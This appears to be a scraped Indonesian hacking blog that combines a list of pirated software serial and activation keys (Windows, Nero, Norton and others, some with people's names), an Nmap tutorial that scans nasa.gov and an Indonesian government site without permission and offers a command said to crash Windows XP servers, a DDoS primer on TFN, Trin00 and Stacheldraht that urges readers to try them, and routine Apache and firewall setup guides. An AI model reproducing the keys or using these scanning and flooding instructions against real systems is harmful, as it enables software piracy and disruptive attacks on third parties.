YFKBB-PQJJV-G996G-VWGXY-2V3X8

» Microsoft windows vista 2006
Name: cristi suta
S/N: TCP8W-T8PQJ-WWRRH-QH76C-99FBW

N

» Nero 7 Premium Reloaded v7.5.9.0A
1C80-0000-19E5-MA2X-4001-1324-3931
1C80-0000-19E5-MA2X-4008-6459-9954
1C80-0000-19E5-MA2X-4008-9974-0906
1C80-0000-19E5-MA2X-4005-9931-5336
1C80-0000-19E5-MA2X-4008-5823-0671

» Nero 7 Premium Reloaded v7.8.5.0
1C80-0000-19E5-MA2X-4003-8871-9910

» Nero 7 Premium Reloaded v7.7.5.1
1C82-0020-19E5-M45X-0FFF-93D9-0BD4
1C82-0020-19E5-M45X-0FFF-GC89-D3N4
1C82-0020-19E5-M45X-0FFF-2X95-1I5J
1C82-0020-19E5-M45X-0FFF-ARA0-0ASR
1C82-0020-19E5-M45X-0FFF-7RLG-K8G7

» Nero 7 Premium Reloaded v7.5.9.1
1C81-0020-19E5-M31X-E42S-D217-7935

» Norton AntiVirus 2007
Product Key: V4FHRMHYH7PR8FF9PY46J3DDC Activation: XHHCWFWH7KTC

» nod32 all serials any
S/N: Name: AV-2364945
S/N: jubqqrjsa2Name: AV-2267079Password : m7auys7jphUser: AV-2593035Password: merjvieno1Name: AV-2230918Serial: 48rf4ieot2?Username: En-2007224 Password: nx1qs5myj6Name: FiENdisH_MBS/N: Name: AV-2267079Pastry all…

O

P

» Power DVD 7.0
Name: S.M Nafis Akhtar
S/N: WTGC3-SBR8C-PWFXA-HAG87-UPXH6-RAYKE 7SJRX-LBFMF-JUH8A-UD88Y-KUNT2-EXUNQ 6XDFP-HRXSM-4J4ZU-C2XBU-EG384-MEEVFGMJLS-EWEUU-TDAGH-R7XUU-JNG4X-KPFXRHi dear friends if u unable to acctivate this software then email me

» SpeedUpMyPC v3.0
00XHEH-M5TY2P-QEZJWB-V8UUHN

Q

R

» regcure 1.0.0.43
S/N: 2E002-D1220-84B07-AAD07

» registry booster all
S/N: 00×242-jj5yyp-5z8z6c-7570ng

S

» Spyware Doctor 4.0.0.2618
Name: craig martindaleS/N: A962-19A8-4171-D2BE-0BAF-5010-7810-23C0-7577-6FFE

» Super DVD Creator v9.30
SDCMM-124272-881221-362392-341621
SDCMM-064745-114192-730109-921381
SDCMM-112154-175236-561511-642441
SDCMM-625237-169174-441194-723975
SDCMM-431046-156136-178255-201392

» S.T.A.L.K.E.R.: Shadow of Chernobyl
FK47-S4JT-576Q-GZTM

» Sunbelt Kerio Personal Firewall v4.3.268
44M67-B7BD4-B3B89-E9B6M-63AF5

» Spyware Doctor v5.0.0.147
Name : Thomas Grassmann
Serial : BFA2-D53B-A6C7-A08B-B95E-C2DD-30F4-8E64-49CF-7E10

T

» Trojan Remover v6.5.5
Username: Nancy Stephens
Licence Key: 000015-YBW39A-9BFFWM-GA26J3-15HY2T-XGDJQT-4U7VNA-ZC4TMG-J4JVN0-WQHD66

» TuneUp Utilities 2007 v6.0.1255.0
Name :BUBlic
Company :TSRh
Serial :6THVJ-XKL6J-XV6L3-8EP52-FBDF8-SFSXU
U

» Uniblue Registry Booster v1.3
00X242-JJ5YYP-5Z8Z6C-7570NG

V

W

WINDOWS VISTA :

Windows Vista Business ———– J9QVT-JJMB9-RVJ38-M8KT6-DMT9M

Windows Vista Home Basic ——— KJTCW-YQGRK-XPQMR-YTQG8-DKVG6

Windows Vista Home Basic N ——- YQWWH-2YD6Y-V3K2X-H4H8V-WJ8WT

Windows Vista Home Premium —— PYYBC-K9XT9-V92KD-6CT89-4VB82

Windows Vista Ultimate ———— PVVFY-2F78Q-8T7M8-HDQB2-BR3YT

Windows Vista Enterprise ———- CYD8T-QHBMC-6RCMK-4GHRD-CRRB7

windows vista 2006
Name: cristi suta
S/N: TCP8W-T8PQJ-WWRRH-QH76C-99FBW

WINDOWS XP :

Windows XP Home Edition K ———- W8F6Q-HM3JB-2XRHD-7Q92J-XKY6W

Windows XP Home Edition KN ——— M9D9J-2TQV2-FBJQP-2M8G8-DGQ26

Windows XP Media Center Edition —– H23CJ-2WXM9-M9D2K-42226-DJWRD

Windows XP Professional Edition K —- FRH2X-6VD7F-YH2TV-2V8B7-J46F6

Windows XP Professional Edition KN — QKBGY-T8JFG-F448Q-24KR9-48XPJ

Windows XP Home Edition ———— GHGCP-3KFC6-Y4J4D-MVG7V-67TV6

Windows XP Professional ————- F9QV9-HDYR3-6QDR4-PGVW9-GTBBJ

Windows XP Professional IA64 Edition - BGVXG-CM3VK-FX848-B9JPY-YJJXD

Windows XP Professional x64 Edition — PFFY7-Y9RRY-MT6C7-XMQPK-RWFCW

Windows XP Tablet PC Edition ——– WFMYK-68Y2T-JD473-W8DMW-8PFHQ

WINDOWS 2000 :

Windows 2000 Professional ———— DDTPV-TXMX7-BBGJ9-WGY8K-B9GHM

Windows 2000 Server (All Versions) —- KRJQ8-RQ822-YRMXF-6TTXC-HD2VM

X

» Xingtone Ringtone Maker v5.0.0
PI74-1013-GABQ-3306

Y

» Your Uninstaller! Pro 2006 v5.0.0.259
Name: PAUL J DEVENZIO
Code: 000016-QA36H2-XW5PPB-6RB7J2-BZ1FJ8-KJQBE9-C2F81Q-FKFEAN-Y5WFRP-EPMHYT

Z

» ZoneLabs ZoneAlarm Pro v6.5.737.000
C7Q38-K6I15-TRJSM-3VN287-D2HB00

» ZoneAlarm AntiSpyware v7.0.337.000
5652x-kwhhr-n7×6b-tdiwmr-7rusk0
4m69p-ghc1f-j5u1b-5es7ek-nfvec0
6p2cn-tk831-tbfw7-d2n29f-28brc0
h8m35-2jufs-phped-nu4fjv-7ina40
0sh7m-2bemm-6t41b-mivepx-n06ig0
5hp0w-3ec5h-xhiwe-4×9hs7-4w8a40
iqxtr-9aegi-axt7g-mmac1j-fv9eq0
acrsk-wtrtn-vs6gi-83amw6-i18u80
1jwiw-wm6tb-wu8i1-gps3xh-240v80

Scanning dengan Nmap

2008-01-11T12:58:00.000-08:00

Nmap adalah Tool untuk eksplorasi jaringan. Merupakan salah satu tool andalan yang sering digunakan oleh Administrator Jaringan, Pen-Test (IT Developer yg dibayar untuk mencari Hole pada System Jaringan) serta Attacker. Tool ini digunakan sebagaimana namanya yaitu Penjelajah System Jaringan (Network Mapper, Network Exploration Tool). Dengan Nmap kamu bisa melakukan Probing (probe) keseluruh jaringan dan mencari tahu service apa yang aktif pada port yang lebih spesifik. Buka saja hanya itu tapi juga mencampur fingerprinting (Banner Grap) yang bisa membandingkan dan memberikan estimasi akan apa jenis Sistem Operasi (OS) target. Ok tanpa basa basi kita langsung ja coba langsung. Misalkan saja kita cari target buat coba-coba,misalkan saja kita mengambil target:

Ø www.nasa.gov

Ø www.presidenri.go.id

kita cek satu persatu:

………………………………………………………………………………………………..

C:\Documents and Settings\Info202>nmap -v -sS -sV -O -v www.nasa.gov

Starting Nmap 4.22SOC2 ( http://insecure.org ) at 2007-10-03 18:33 SE Asi

ard Time

Warning: Hostname www.nasa.gov resolves to 2 IPs. Using 125.160.16.11.

Initiating Parallel DNS resolution of 1 host. at 18:33

Completed Parallel DNS resolution of 1 host. at 18:33, 0.05s elapsed

Initiating SYN Stealth Scan at 18:33

Scanning 11.subnet125-160-16.akamai.telkom.net.id (125.160.16.11) [1705 p

Discovered open port 443/tcp on 125.160.16.11

Discovered open port 22/tcp on 125.160.16.11

Discovered open port 80/tcp on 125.160.16.11

Discovered open port 500/tcp on 125.160.16.11

Completed SYN Stealth Scan at 18:34, 44.80s elapsed (1705 total ports)

Initiating Service scan at 18:34

Scanning 4 services on 11.subnet125-160-16.akamai.telkom.net.id (125.160.

Completed Service scan at 18:34, 6.47s elapsed (4 services on 1 host)

Initiating OS detection (try #1) against 11.subnet125-160-16.akamai.telko

d (125.160.16.11)

SCRIPT ENGINE: Initiating script scanning.

Initiating SCRIPT ENGINE at 18:34

Completed SCRIPT ENGINE at 18:34, 0.17s elapsed

Host 11.subnet125-160-16.akamai.telkom.net.id (125.160.16.11) appears to

.. good.

Interesting ports on 11.subnet125-160-16.akamai.telkom.net.id (125.160.16

Not shown: 1586 closed ports, 115 filtered ports

PORT STATE SERVICE VERSION

22/tcp open ssh Akamai SSH Server-VII (protocol 1.99)

80/tcp open http AkamaiGHost (Akamai's HTTP Acceleration/Mirror serv

443/tcp open ssl OpenSSL

500/tcp open ssh Akamai SSH Server-VII (protocol 1.99)

Device type: general purpose

Running: Linux 2.6.X

OS details: Linux 2.6.8

OS Fingerprint:

OS:SCAN(V=4.22SOC2%D=10/3%OT=22%CT=1%CU=%PV=N%G=N%TM=47037E59%P=i686-pc-w

OS:dows-windows)SEQ(SP=C3%GCD=1%ISR=C9%TI=Z%TS=A)OPS(O1=M5B4ST11NW0%O2=M5

OS:ST11NW0%O3=M5B4NNT11NW0%O4=M5B4ST11NW0%O5=M5B4ST11NW0%O6=M5B4ST11)WIN(

OS:=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16A0)ECN(R=Y%DF=Y%TG=40%W=16D

OS:O=M5B4NNSNW0%CC=N%Q=)T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3

OS:=Y%DF=Y%TG=40%W=16A0%S=O%A=S+%F=AS%O=M5B4ST11NW0%RD=0%Q=)T4(R=Y%DF=Y%T

OS:40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%R

OS:0%Q=)T6(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%TG=40%W=

OS:S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=N)IE(R=N)

Uptime: 22.143 days (since Tue Sep 11 15:08:51 2007)

TCP Sequence Prediction: Difficulty=195 (Good luck!)

IPID Sequence Generation: All zeros

Read data files from: C:\Program Files\Nmap

OS and Service detection performed. Please report any incorrect results a

//insecure.org/nmap/submit/ .

Nmap finished: 1 IP address (1 host up) scanned in 57.203 seconds

Raw packets sent: 2265 (101.968KB) | Rcvd: 1716 (79.432KB)

………………………………………………………………………………………………..

C:\Documents and Settings\Info202>nmap -v -sS -sV -O -v www.presidenri.go.id

Starting Nmap 4.22SOC2 ( http://insecure.org ) at 2007-10-03 18:35 SE Asia Stand

ard Time

Read data files from: C:\Program Files\Nmap

Note: Host seems down. If it is really up, but blocking our ping probes, try -P0

Nmap finished: 1 IP address (0 hosts up) scanned in 4.344 seconds

Raw packets sent: 4 (136B) | Rcvd: 0 (0B)

………………………………………………………………………………………………..

Ok kalo kurang tau apa gunanya,baiklah saya kan coba terangkan sedikit, Ada beberapa tipe scan yang sering digunakan untuk melihat port nama saja yang terbuka dari ribuan port; beberapa perintah yang ada seperti, -sT, -sF, -sR dsb. Yang sering saya gunakan adalah:

-sS - TCP SYN scan: teknik ini kadang di sebut “half-open” scanning, karena anda tidak membuka penuh hubungan TCP. Jika di responds dengan SYN|ACK maka port berarti terbuka. Bila responds berupa RST menunjukan servis tidak jalan. Pada saat SYN|ACK di terima, nmap akan meresponds dengan RST. Dengan teknik ini, sedikit situs yang akan mencatat scanning yang dilakukan. Hal ini di sebut stealth scannning.

Ada banyak option yang mengatur cara kerja nmap, beberapa yang sering saya gunakan misalnya:

-P0 – tidak melakukan ping ke target, untuk menghindari kita terlihat oleh target.

-f - menggunakan potongan paket kecil-kecil (fragmented) agar sulit di deteksi oleh software pendeteksi penyusup.

-v – verbose mode, untuk melihat hasil antara proses scan pada layar.

-O – mencoba menebak sistem operasi yang digunakan oleh mesin target.

Setelah paham,maka secara otomatis pasti kita paham dengan 2 kasus diatas,dimana (dari sudut pandang nmap ^_^) ternyata web kita lebih unggul…. Hehe…..

Ini terlihat dari hasil keluaran nmap dimana pada nasa nmap bekerja dengan baik dengan memberikan informasi yang lengkap….termasuk OS nya….

Kayaknya itu saja yang bias saya contohkan….

Tapi buat oleh-oleh coba deh perintah ini: nmap -T 5 -M 1000 -sT (ip sasaran)

Keterangannya? Cari sendiri dech….tapi yang jelas perintah ini akan bikin crash server,apabila server itu berbasis windows Xp…..

ddos1

2007-10-26T04:43:00.001-07:00

Jasakom,Sebelom membacanya sebaiknya sediain rokok ama kopi soalnya buwanyak banget, aku yang posting aja ampe bengong

1.Apakah itu DDOS ?

2.Definisi Denial of Service Attacks

3.Distributed Denial of Service (DDOS) Attacks.

4.Mengapa Serangan DDOS menjadi sangat populer ?

5.Efek dari serangan DDOS

6.Teknikal overview dari aplikasi DDOS

Apakah itu DDOS ?

Sampai dengan sekarang ini pengertian tetang DDOS adalah seperti yang anda dengarkan beberapa waktu yang lalu mengenai serangan terhadap web site Yahoo! MSN, CNN, Buy.com, eBay dan Amazon.com. Informasi terkini yang didapat kan adalah bahwa serangan hacker itu berasal dari West Coast, United States (Oregon dan California). Dari laporan FBI menuliskan bahwa serangan ini melibatkan beberapa network dari universitas yang ada di daerah tersebut yaitu Stanford, state California dan Santa. Barbara. Pada whitepaper ini akan dibahas sekilas mengenai cara serangan para hacker tersebut ke beberapa web site yang disebutkan di atas.

Definisi Denial of Service Attacks

Serangan Denial of Service(DOS) ini terjadi apabila penyerang atau yang sering terdengar dengan istilah hacker ini merusak host atau sevice yang ada sehingga host atau service itu tidak dapat lagi berkomunikasi secara lancar di dalam network neighborhood nya.

Serangan seperti ini juga dapat menghancurkan seluruh host dengan mengakibatkan “kernel panic” pada Linux dan keluarga UNIX lainnya atau lebih umumnya the “blue screen on death” nya Windows NT dan 98.

Serangan DOS ini dapat ditujukan dengan lebih spesifik terhadap services yang ada, contohnya seperti host Web Server dan fungsi dari Network Interface Card (NIC).

Bahkan yang lebih menyenangkan lagi si penyerang menargetkan serangan khusus pada network environment seperti network bandwith dengan menciptakan network request imitasi sehingga terjadi network bussy atau istilah yang lebih familiarnya bottleneck (yang pasti bandwith networknya menjadi full of waste ). Seperti anda ketahui bahwa bandwith adalah bagian yang sangat esensial dari koneksi internet (saluran ke internet). Dengan memenuhi saluran tersebut dengan infomasi sampah(network request imitasi) si penyerang dapat dengan bebas menguasai network bandwith yang masih available. Serangan DOS terakhir yang terjadi adalah pada tgl 7 January 2000.

Serangan DOS ini telah ada pada tahun 1988 yaitu Robert Moris Internet Worm, Melissa virus yang terkenal pada tahun dan masih banyak lagi kejadian DOS pada network dan perusahaan yang tidak diketahui.

Meskipun hal-hal ini disebabkan oleh worm, virusdan beberapa macam dari program yang ada, semua ini terjadi dengan cara yang sama yaitu : satu host menyampaikan informasi atau berkomunikasi dengan host lainnya dan kemudian secara efektif menghancurkan korban dengan mengirim segudang informasi yang tidak dapat di tanggani oleh korban itu sendiri.

Serangan Distributed Denial of Service (DDOS).

Perlu digariskan disini bahwa DOS dan DDOS adalah beda. DOS adalah serangan hanya dengan satu node sedangkan DDOS yaitu dengan beberapa node. Pada tahun 1998 kemajuan dari DOS yang tradisional terlihat dari 3 konsep baru serangan yaitu :

Serangan dengan melalui beberapa host.

Serangan dengan koordinasi diantara banyak individu yang ada (member dari pemakai network=internet)

Serangan dengan menggunakan distribusi system dimana hal ini untuk mencoba membuat bingung jalan menuju ke titik pusat serangan.

Si penyerang (titik pusat) menyerang host yang ada. Host tersebut tidak berkomunikasi secara langsung dengan korban. Host tersebut adalah administrator yang mengontrol dalam network mereka sendiri yang terdiri dari “Master” dan “Daemon”.Si penyerang dapat mengontrol/menguasai satu atau bahkan lebih node master tersebut. Master node secara umum akan mengontrol beberapa bahkan lusinan node daemon, yang kemudian akan di alamatkan ke targer/korban.Maka serangan yang dihasilkan akan berupa “packet storm” yang dapat menghancurkan host atau bandwith dari network tersebut.

Keuntungan dan perspektif sebagai hacker dengan menggunakan serangan DDOS yang dapat dilihat disini adalah :

Si Penyerang dapat menggunakan ratusan system untuk menghancurkan korban.

Serangan tersebut menghasilkan kiriman “packet” yang sangat besar dan dengan cepat dapat menghancurkan korban(target host).

Jika network atau host dapat diatur/dimanage dengan sukses dengan serangan ini, maka dapat anda bayangkan betapa besar koneksi yang digunakan oleh sebuah network dapat dihancurkan dengan serangan DDOS ini. Jadi semakin besar suatu jaringan maka akan semakin besar pula serangan yang ada(menyenangkan bukan ?).

Contoh kasus dapat anda lihat yaitu Yahoo! Dan eBay, perusahaan seperti ini menggunakan kompleks server yang disebut sebagai “cluster servers” dimana mereka bertujuan dengan memberikan service yang OK kepada pelanggan(bandwith yang OK dalam hal ini).Jadi dapat dilihat disini bahwa system yang “robust”(seperti banyak tertulis dalam produk Microsoft) dan system yang “well-managed” pun dapat dengan mudah dihancurkan dengan system serangan seperti ini. (tertarik anda untuk mencoba ?)Tidak hanya programming kita dapat menggunakan multi tier desain tapi dalam hacking pun ada desainnya. Dalam struktur multi tier ini korban akan sangat sulit melacak titik pusat dari serangan tersebut.

Sejauh ini sangat penting untuk dimegerti bahwa sebagian besar dari operator dari host dimana master dan daemon itu berada merupakan bagian pendukung dari DOS ini. Hal ini terjadi karena hacker telah berhubungan dengan master dan daemon node dimana mereka telah menginstall software DOS ini tanpa sepengetahuan pemilik host/administrator/operatornya. Seandainya si korban dapat melacak daemon host sekalipun, pemilik/operator dari host tsb tidak dapat memberikan informasi yang cukup untuk meneruskan upaya ini.

Mengapa Serangan DDOS menjadi sangat populer ?

Beberapa jawabannya dapat anda lihat dibawah ini :

Banyak Operating System dan aplikasi yang memberikan kemudahan dalam instalasi sehingga memberikan beberapa keuntungan seperti menghemat waktu mempelajarinya dan bahkan tidak perlu seorang ahli IT dalam mengoperasikannya. Maka akan sangat sulit bagi mereka untuk memberikan sekuriti kepada system yang mereka install secara otomatis tsb. Bukankah lebih mudah menginstall suatu program atau aplikasi dengan menggunakan default setting yang sudah ada. Contohnya dapat anda lihat pada system BII dan Bank Bali(segera di publish) di site Jasakom.

Banyak dari network environment bernasis pada single operating system. Contohnya jika menggunakan NT semuanya atau Linux di seluruh network environment. Router Cisco, dimana secara merata cara setting nya adalah sama di semua tempat.Arsitektur internet yang alami secara mendasar memang sangat tidak secure dan memerlukan lingkungan kerja yang complex, mahal dan banyak menghabiskan waktu.

Software yang semakin komplex. Kompleks dalam hal ini adalah mengenai source code sehingga hole-hole yang ada dapat di exploit oleh hacker. Contohnya saja seperti Microsoft yang banyak service packnya itu. Software yang ada semakin powerful. Dimana software-software yang ada dapat diakses tanpa harus dengan pengetahuan yang terlalu luas.

Kemajuan internet telah membawa banyak user yang tidak berpengalaman ikut serta dalam lingkungan networking sehingga akan lebih mudah bagi mereka untuk “misconfigured” system daripada memberikan keuntungan bagi system tsb. Serangannya sulit dilacak.

karena perlu waktu yang berhari-hari bahkan bulanan sehingga si penyerang sudah relatif lepas hari kesalahan yang ada.

5. Efek dari serangan DDOS

Secara umum end user atau korban serangan DDOS ini hanya sadar bahwa serangan seperti in hanya merupakan gangguan yang memerlukan restart system. Tetapi bagaimanapun juga hal seperti ini akan menggangu bisnis yang sedang dijalankan apalagi bisnis yang sangat tergantung kepada system di internet.

Serangan DDOS ini juga dapat merupakan pengalihan point of view dari si hacker untuk mendapatkan informasi penting yang ada. Pada dasarnya serangan DOS ini merupakan rangkaian rencana kerja yang sudah disusun oleh hacker dalam mencapai tujuannya yang telah ditargetkan. Jadi hacker tsb tidak hanya iseng mengadakan serangan DOS ini.

Contohnya adalah jika hacker tsb ingin menyerang Host B maka ia harus menggunakan computer A sebagai alat utk membingungkan korban dalam tracking si penyerang. Dan host A harus mempunyai trust relationship ke host B.

Tehnikal overview dari aplikasi DDOS

Berikut ini akan dibahas secara tehnikal software yang digunakan untuk melancarkan serangan DDOS ini. Mungkin pembahasan ini dapat digunakan sebagai bahan dalam memproteksi diri.

Disini kami hanya membahas 4 macam software dari yang sangat banyak di underground (swing-swing terbang oiii ) maaf jika anda berpikir saya terlalu berfantasi (I am TheDreamer)

§ The Tribal Flood Network (TFN)

TFN ini diciptakan oleh hacker yang cukup terkenal pada kalangan underground yang bernama Mixter. Aplikasi ini memungkinkan penyerang membuat flood connection dengan menggunakan protocol yang ada pada TCP/IP :

UDP : difokuskan pada domain name system dan network management program.

TCP : pusat e-mail dan web transaksi

ICMP : digunakan oleh para professional untuk troubleshooting network

Nama program masternya adalah : tribe.c dan program daemon bernama td.c

§ Trin00

Software ini menggunakan UDP untuk mengirimkan flood packets network dengan menggunakan UDP. Port yang digunakan adalah :

Attack to Master : TCP Port 27665

Master to Daemon : UDP Port 27444

Daemon to Master(s) : UDP Port 31335

Program master : master.c

Program Daemon : ns.c

Sebagai saran, program ini tidak bagus untuk digunakan karena master dan daemon berhubungan dengan clear text.

§ Stacheldraht

Program ini cukup ok dan masih baru lho. Nama program ini dalam bahasa Jerman yang berarti “Barb Wire” kenal kan dengan film Barb Wire si Pamela Anderson (Big Tit women). Sama sepeti TFN software ini menggunakan UDP, TCP, ICMP dalam menciptakan rootshell pada port port yang ada. Menggunakan komunikasi encrypt antar master dan daemon. Memiliki kemampuan mengupdate daemonnya sendiri secara otomatis. Maka dari itu program ini paling effisien dan cukup bahaya tapi keren banget.

Port TCP : 16660 dan 60001

Master program bernama : mserv.c

Daemon program bernama : td.c

Program ini memiliki client yang juga sebagai telnet : client.c

Komunikasi antara master dan agent menggunakan ICMP dan TCP sedangkan TFN hanya menggunakan ICMP.

§ TFN2K

Di realease pada tgl 21 Desember 1999. Seperti halnya Stacheldraht program ini meng encrypt tranmision. Berjalan pada platform Windows NT. Tetapi program ini lebih mudah di trace pada daemonnya.

Software DDOS lainnya yang dapat saya sebutkan disini adalah paket seperti bliznet, dscan dan saltine cracker. Dscan adalah software yang dapat scanning distribusi operating system dan cukup sulit untuk di lacak dalam penggunaannya. Sedangkan yang lebih keren lagi adalah saltine cracker suite yang dapat menembus password untuk site-site yang perlu authentication.

Dari ke-4 software di atas yang disebutkan kecuali Stacheldraht setiap software di atas memiliki aplikasi master dan daemon seperti yang telah dibahas sebelumnya diatas.

Sedangkan Stacheldraht memiliki client yang hampir sama dengan telnet. Dimana hacker dapat mengontrol ratusan PC hanya dengan component dari software tsb. Cara kerja dari component ini adalah seperti membuat cabang ke client software(cthnya seperti Windows 98 yang sudah memiliki Telnet client sendiri), jadi hacker dapat mengontrol master dan client.

Hal-hal dan sifat-sifat yang menarik dari kesamaan ke –4 software di atas adalah sbb :

Mudah di instalasi dan di gunakan.(Buruan deh dicoba) Tidak mudah dilacak jika digunakan, seperti pesawat hantu USA “Stealth” yang tidak dapat di deteksi oleh radar.Selain dari TFN2K, software lainnya tsb bekerja pada system UNIX. Aslinya software tsb di compiled untuk system Solaris tetapi sekarang telah ada yang dibuat untuk platform lainnya seperti Linux dan Windows NT.

Master dan Daemon selalu diproteksi dengan password.Pada Master component list dapat di daftarkan dengan mudah daemon yang ingin ditambahkan ke dalamnya.

Setiap DDOS aplikasi memiliki sign tersendiri, sehingga akan adanya kemungkinan untuk mendefinisikan master atau daemon yang telah diinstall di komputer anda.

Bagaimana menginstalasi program DDOS

Untuk menginstalasi program DDOS ini, master atau daemon node harus dikomunikasikan terlebih dahulu sehingga mendapatkan trust security. Untuk mendapatkan trust security adalah dengan cara yang sangat mudah. Gunakan scan tool dari range IP di internet kemudian setelah mendapatkan host-host tsb, baru diinstall client software pada host-host yang masih full of hole security. Satu hal yang cukup menarik adalah software client tsb dapat di uninstall dengan cara di set terlebih dahulu, di uninstall setelah berapa kali serangan.Hal ini dikarenakan dapat ditrace dengan mudah host yang menyerangnya.

Deteksi terhadap keberadaan installasi DDOS software

Dalam hal ini belum ditemukan tools yang paling OK dalam mendeteksi program DDOS ini.

Hal ini karena program DDOS masih menggunanakan system client-server yang masih tradisional. Program tsb menggunakan port tertentu pada saat aktif sehingga untuk dapat mencegah hal ini maka anda hanya dapat mencari port yang open untuk di closed dengan menggunakan perintah netstat.Anda juga dapat menggunakan perintah find / -name client, tetapi tentu saja anda sudah tahu program client yang diinstall pada komputer anda.Banyak dari program DDOS lebih banyak menggunakan fasilitas crontab UNIX yang secara automatic menjalankan aplikasi. Dalam hal seperti ini maka perlu check crontab apakah ada file yang termasuk dalam file-file yang perlu dicurigai sebagai client dari program DDOS ini.

Program yang dapat dipakai untuk mendeteksi program DDOS ini adalah

RID yang ditulis oleh si hacker Mixter (pembuat TFN dan TFN2K), anda dapat mencarinya di internet dengan mudah.Sickenscan yang dapat mendeteksi password default dari program Stacheldraht.Trin00killer adalah untuk me-remove program trin00 master dan daemonnya.

KONFIGURASI HTTP / WEB SERVER

2007-10-26T04:39:00.000-07:00

#----------------------------------------------#

judul : KONFIGURASI HTTP / WEB SERVER

auth : 'di ambil oleh PakTani

email : PakTani@samarindahack.i-p.com , paktan1@yahoo.com

channel : #samarindahack

url : http://paktani.tk , www.samarindahack.org

#----------------------------------------------#

1. login root dan isi password root

2. edit file httpd dengan menjalankan mcedit :

# mcedit /etc/httpd/conf/httpd.conf

ServerType standalone

ServerRoot "/etc/httpd"

LockFile /var/lock/httpd.lock

PidFile /var/run/httpd.pid

ScoreBoardFile /var/run/httpd.scoreboard

ResourceConfig conf/srm.conf

AccessConfig conf/access.conf

Timeout 300

KeepAlive On

MaxKeepAliveRequests 100

KeepAliveTimeout 15

MinSpareServers 5

MaxSpareServers 20

StartServers 8

MaxClients 150

MaxRequestsPerChild 100

#Listen 3000

#Listen 12.34.56.78:80

BindAddress *

# LoadModule foo_module modules/mod_foo.so

#LoadModule mmap_static_module modules/mod_mmap_static.so

LoadModule vhost_alias_module modules/mod_vhost_alias.so

LoadModule env_module modules/mod_env.so

LoadModule config_log_module modules/mod_log_config.so

LoadModule agent_log_module modules/mod_log_agent.so

LoadModule referer_log_module modules/mod_log_referer.so

#LoadModule mime_magic_module modules/mod_mime_magic.so

LoadModule mime_module modules/mod_mime.so

LoadModule negotiation_module modules/mod_negotiation.so

LoadModule status_module modules/mod_status.so

LoadModule info_module modules/mod_info.so

LoadModule includes_module modules/mod_include.so

LoadModule autoindex_module modules/mod_autoindex.so

# Extra Modules

LoadModule perl_module modules/libperl.so

LoadModule php_module modules/mod_php.so

LoadModule php3_module modules/libphp3.so

#AddModule mod_mmap_static.c

AddModule mod_vhost_alias.c

AddModule mod_env.c

AddModule mod_log_config.c

AddModule mod_log_agent.c

AddModule mod_log_referer.c

# Extra Modules

AddModule mod_perl.c

AddModule mod_php.c

AddModule mod_php3.c

#ExtendedStatus On

Port 80

User nobody

Group nobody

ServerAdmin root@localhost

ServerName localhost

DocumentRoot "/home/httpd/html"

Options FollowSymLinks

AllowOverride None

Options Indexes Includes FollowSymLinks

AllowOverride None

Order allow,deny

Allow from all

UserDir public_html

DirectoryIndex index.html index.htm index.shtml index.cgi

AccessFileName .htaccess

Order allow,deny

Deny from all

UseCanonicalName On

TypesConfig /etc/mime.types

DefaultType text/plain

MIMEMagicFile share/magic

HostnameLookups Off

ErrorLog /var/log/httpd/error_log

LogLevel warn

LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\""

combin

LogFormat "%h %l %u %t \"%r\" %>s %b" common

LogFormat "%{Referer}i -> %U" referer

LogFormat "%{User-agent}i" agent

CustomLog /var/log/httpd/access_log common

CustomLog /var/log/httpd/referer_log referer

CustomLog /var/log/httpd/agent_log agent

CustomLog /var/log/httpd/access_log combined

ServerSignature On

Alias /icons/ "/home/httpd/icons/"

Options Indexes MultiViews

AllowOverride None

Order allow,deny

Allow from all

ScriptAlias /cgi-bin/ "/home/httpd/cgi-bin/"

AllowOverride None

Options ExecCGI

Order allow,deny

Allow from all

IndexOptions FancyIndexing

AddIconByEncoding (CMP,/icons/compressed.gif) x-compress x-gzip

AddIconByType (TXT,/icons/text.gif) text/*

AddIconByType (IMG,/icons/image2.gif) image/*

AddIconByType (SND,/icons/sound2.gif) audio/*

AddIconByType (VID,/icons/movie.gif) video/*

AddIcon /icons/binary.gif .bin .exe

AddIcon /icons/binhex.gif .hqx

AddIcon /icons/tar.gif .tar

AddIcon /icons/world2.gif .wrl .wrl.gz .vrml .vrm .iv

AddIcon /icons/compressed.gif .Z .z .

KONFIGURASI FIREWALL DAN GATEWAY

2007-10-26T04:38:00.001-07:00

#----------------------------------------------#

judul : KONFIGURASI FIREWALL DAN GATEWAY

auth : 'di ambil oleh PakTani (sumber KPLI)

email : PakTani@samarindahack.i-p.com , paktan1@yahoo.com

channel : #samarindahack

url : http://paktani.tk , www.samarindahack.org

#----------------------------------------------#

================================

1. Login sebagai root dan isi password.

2. Lihat isi file ip_forward menggunakan perintah cat :

#cat /proc/sys/net/ipv4/ip_forward

3. Ubah Nilai atau on kan paket ip_forward mengunakan echo :

#echo "1" > /proc/sys/net/ipv4/ip_forward

#cat /proc/sys/net/ipv4/ip_forward

4. Jalankan Linuxconf :

#linuxconf

|_ Firewalling

|_ Firewalling Defaults (packets filtering)

- Forwarding rules [x]

- CuSeeMe [x]

- Ftp [x]

- Irc [x]

|_ Forward Firewalling

|_ Add

- [x] This rule is active

- Protocol : All

- [x] Do Masquerading

- Rule's policy : (o) Accept

- Host or Network : 192.168.0.0

- Netmask : 255.255.255.0

- Accept : [x] Tcp Syn Packet

- Host or Network : 0.0.0.0

- Netmask : 255.255.255.0

- Accept : [x] Tcp Syn Packet

- Logging : [x] is enabled

|_ Add

- [x] This rule is active

- Protocol : All

- [x] Do Masquerading

- Rule's policy : (o) Accept

- Host or Network : 127.0.0

- Netmask : 255.255.255.0

- Accept : [x] Tcp Syn Packet

- Host or Network : 0.0.0.0

- Netmask : 255.255.255.0

- Accept : [x] Tcp Syn Packet

- Logging : [x] is enabled

selanjutnya aktifkan konfigurasi linuxconf firewalling anda dengan menjalankan

perintah :

5.Update konfigurasi network anda setelah menjalankan linuxconf dengan menjalankan perintah berikut :

# netconf --update

Checking base configuration

Checking kernel's modules

Mounting local volumes

Checking files permissions

